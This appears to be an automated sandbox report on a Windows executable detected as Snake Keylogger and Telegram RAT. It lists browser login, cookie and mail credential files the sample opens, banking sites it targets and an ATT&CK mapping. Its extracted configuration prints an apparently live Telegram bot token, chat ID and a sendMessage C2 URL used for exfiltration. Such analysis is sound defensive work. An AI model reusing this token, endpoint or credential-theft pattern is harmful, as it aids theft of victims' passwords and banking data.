Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596400	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596006	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594140	Jump to behavior

Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.000000000571E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd51106829459f<
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036E2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWbr
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.000000003714A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	API call chain: ExitProcess graph end node			graph_0-4462
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	API call chain: ExitProcess graph end node			graph_0-4461

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040620C

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Process created: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe "C:\Users\user\Desktop\Swift Copy_18.02.2025.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Code function: 0_2_00405EC4 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405EC4

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000006.00000002.3916059325.0000000035EA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Swift Copy_18.02.2025.exe PID: 7124, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	12 File and Directory Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY", "Chat_id": "8173633564", "Version": "4.4"}
Source: Swift Copy_18.02.2025.exe.7124.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendMessage"}

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_390687A8 CryptUnprotectData,		6_2_390687A8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_39068EF1 CryptUnprotectData,		6_2_39068EF1

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49732 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49731 -> 149.154.167.220:443

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Swift Copy_18.02.2025.exe	Virustotal: Detection: 25%			Perma Link
Source: Swift Copy_18.02.2025.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 055AF45Dh	6_2_055AF4AC
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 055AF45Dh	6_2_055AF2D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 055AFC19h	6_2_055AF974
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7D069h	6_2_38E7CDC0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E73308h	6_2_38E72EF0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E72D41h	6_2_38E72A90
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7F781h	6_2_38E7F4D8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7F329h	6_2_38E7F080
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_38E70040
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_38E70853
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7EED1h	6_2_38E7EC28
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7FBD9h	6_2_38E7F930
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E73308h	6_2_38E72EED
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7DD71h	6_2_38E7DAC8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_38E70673
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7D919h	6_2_38E7D670
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E73308h	6_2_38E73236
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7D4C1h	6_2_38E7D218
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7EA79h	6_2_38E7E7D0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7E621h	6_2_38E7E378
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E7E1C9h	6_2_38E7DF20
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E70D0Dh	6_2_38E70B30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 38E716F8h	6_2_38E70B30
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906B5E6h	6_2_3906B318
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39067EB5h	6_2_39067B78
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39069280h	6_2_39068FB0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906E816h	6_2_3906E548
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39060FF1h	6_2_39060D48
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906C826h	6_2_3906C558
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 39061449h	6_2_390611A0
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906ECA6h	6_2_3906E9D8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906CCB6h	6_2_3906C9E8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390618A1h	6_2_390615F8
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906DEF6h	6_2_3906DC28
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390662D9h	6_2_39066030
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 3906BF06h	6_2_3906BC38
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 4x nop then jmp 390602E9h	6_2_39060040
